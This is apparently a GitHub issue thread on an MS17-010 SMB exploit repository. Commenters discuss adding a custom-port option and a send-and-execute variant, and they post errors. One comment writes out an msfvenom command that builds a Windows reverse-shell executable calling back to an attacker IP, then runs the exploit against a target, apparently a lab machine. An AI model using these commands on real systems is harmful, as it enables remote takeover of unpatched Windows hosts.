worawit / MS17-010

MS17-010
2.14k stars 1.1k forks source link

Adding suport to custom tcp port #35

Open helviojunior opened 6 years ago

helviojunior commented 6 years ago

I added support to custom TCP port, it is very usefull in case of port fowarding and pivoting.

My Best Regards.

tlmyasirs commented 5 years ago

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

oriolmiranda commented 10 months ago

I added a new file, based on zzz_exploit.py to send and execute an windows executable file

using zzz_exploit.py, victim >> pwned.txt created successfully but using send_and_execute execution.py Starting service mTfl..... SCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion. Removing service mTfl..... Done

Same error, has anyone solved it?

purplebyteone commented 4 months ago

Hey,

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.30 LPORT=8888 EXITFUNC=thread -f exe -a x86 --platform windows -o rev_10.10.16.30_8888.exe

python send_and_execute.py 10.129.235.221 rev_10.10.16.30_8888.exe

Trying to connect to 10.129.235.221:445 Target OS: Windows 5.1 Using named pipe: browser Groom packets Traceback (most recent call last): File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 1077, in exploit(target, port, pipe_name) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 839, in exploit if not info['method'](conn, pipe_name, info): File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/send_and_execute.py", line 615, in exploit_fish_barrel conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 262, in send_trans self.send_raw(self.create_trans_packet(setup, param, data, mid, maxSetupCount, totalParameterCount, totalDataCount, maxParameterCount, maxDataCount, pid, tid, noPad)) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 258, in create_trans_packet _put_trans_data(transCmd, param, data, noPad) File "/home/parrot/Desktop/Retired/Windows/Easy/Legacy/mysmb.py", line 73, in _put_trans_data transData = ('\x00' * padLen) + parameters TypeError: can only concatenate str (not "bytes") to str

How can I fix this?